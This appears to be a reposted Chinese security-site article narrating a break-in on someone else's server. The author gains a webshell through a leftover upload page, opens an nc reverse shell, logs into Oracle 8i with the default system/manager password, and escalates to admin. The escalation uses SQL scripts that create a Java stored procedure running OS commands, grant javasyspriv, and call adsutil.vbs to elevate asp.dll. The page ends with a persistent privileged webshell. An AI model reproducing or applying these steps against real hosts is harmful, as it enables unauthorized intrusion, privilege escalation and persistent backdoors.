English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 威盾新闻 >> 利用Oracle系统账户默认口令提升权限

 

利用Oracle系统账户默认口令提升权限

威盾防火墙 2014-12-07

 
 近日,偶到一主机上逛了一圈。主机的配置还算是安全,偏偏一个比较隐藏的目录下残留了upfile.asp,结果轻轻松松的得到了webshell。 

  接着在主机上逛了逛,拿出superscan从外面扫了下,只开放了80端口。 

  从user\程序目录里,发现有一快捷方式:firecontrol,好象是某款硬件防火墙的控制台。WEBSHELL下检测了下开放的服务,发现一般的可提权的方法都不可行,无SERV-U等等,主机的补丁也是打到了最新。 

  试了下传了个NC上去,反连接得到一SHELL,这下比在老兵的管理器里舒服多了。 在C盘下看到一个目录oracle,看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,确定了主机的服务名“xxx”,看了下版本“oracle 8i”,用数据库连接器 Provider=MSDAORA.1;Password=manager;User ID=system;DataSource=xxxx试了下默认的system账户,密码manager,结果真的就连接到了本地的oracle服务。 

  这下好了,oracle的system账户就像是mssql下的sa,我们来通过他来提升权限,马上编辑了几个脚本。 

  1.sql create or replace and compilejava source named "Util"asimport java.io.*;import java.lang.*; public class Util extends Object{public static int RunThis(String args){Runtime rt = Runtime.getRuntime();int rc = -1; try{Process p = rt.exec(args);int bufSize = 4096;BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);int len;byte buffer[] = new byte[bufSize];// Echo back what the program spit outwhile ((len = bis.read(buffer, 0, bufSize)) != -1)System.out.write(buffer, 0, len); rc = p.waitFor();}catch (Exception e){e.printStackTrace();rc = -1;}finally{return rc;}}} 

  2.sql create or replacefunction RUN_CMD(p_cmd in varchar2) return numberaslanguage javaname 'Util.RunThis(java.lang.String) return integer'; 

  3.sql create or replace procedure RC(p_cmd in varchar2)asx number;beginx := run_cmd(p_cmd);end;保存在c:\下,然后用反连接得到的shell运行sqlplussystem/manager@xxx然后再来执行脚本。 

  SQL>@C:\1.sqlSQL>@C:\2.sqlSQL>@C:\3.sql 

  看到JAVA已创建、函数已创建、过程已创建,接着我们继续 

  SQL> variable x number;SQL> set serveroutput onSQL> exec dbms_java.set_output(100000);SQL>grant javasyspriv to system 

  看到授权成功。接着我们就可以来执行系统命令了。 

  我想先把ASP.dll加入特权一组 

  SQL>exec :x := RUN_CMD('cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.dll" '); 

  看到过程已经成功完成,这个时候我们重新登陆我们的webshell,他已经具有admin权限了。接着,再用NC返回一个shell,已经是管理权限的,我们可以做我们想干的事了。因为这个主机有防火墙过滤除80以外的端口,所以不好做图形的后门,只有留下一有权限的webshell。

相关内容: 最新内容:
“小不点”伪装成播放软件下载恶意程序[2014-12-07]
学习“CC攻击”[2014-11-25]
对抗DDOS攻击的八种“武器”[2014-11-24]
A10启动“安全策略引擎SPE”提升性能[2014-11-24]
使用T-SQL导入数据时报错“将截断字符串或二进制数据”[2014-11-22]
Web安全,向“前”看!——读国内第一本Web前端黑客书[2014-11-18]
查找数据库里所有表当前的最大id[2014-12-07]
数据库设计之主键的思考[2014-12-07]
SQL或HQL预编译语句,能够防止SQL注入,但是不能处理%和_特殊字[2014-12-07]
ASP木马Webshell的安全防范解决办法[2014-12-07]
如何用应用交付技术优化Oracle数据库?[2014-12-07]
黑客技巧:Google hacking实现以及应用[2014-12-07]